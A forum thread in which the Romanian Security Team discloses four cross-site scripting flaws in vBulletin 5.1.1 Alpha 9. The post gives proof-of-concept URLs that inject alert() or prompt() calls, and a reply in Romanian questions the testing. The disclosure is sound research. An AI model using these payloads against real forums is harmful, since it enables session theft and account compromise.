Jump to content
Nytro

[RST] vBulletin 5.1 Multiple XSS vulnerabilities

By Nytro, in Proiecte RST

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted 
Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilities
Authors: Romanian Security Team
Website: https://rstforums.com/forum/
Date published: 19 April 2014
Software: vBulletin
Version: 5.1.1 Alpha 9

[XSS] Random topic

- https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//

[XSS] New private message

- https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>

[XSS] View PM: you must know or bruteforce private message ID (830372)

- https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//

[DOM XSS] Help

- https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("PoC")>

(c) Romanian Security Team 2014

sensi Newbie

sensi

Posted
Posted (edited)

Felicitari baieti! +1 pentru RST

Trist ca doar la topicurile de cacat sunt 100 de pagini si 145.656.32543,21 de reply-uri...

//Esti sigur ca ai testat pe versiunea vBulletin 5.1?

Edited by sensi

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...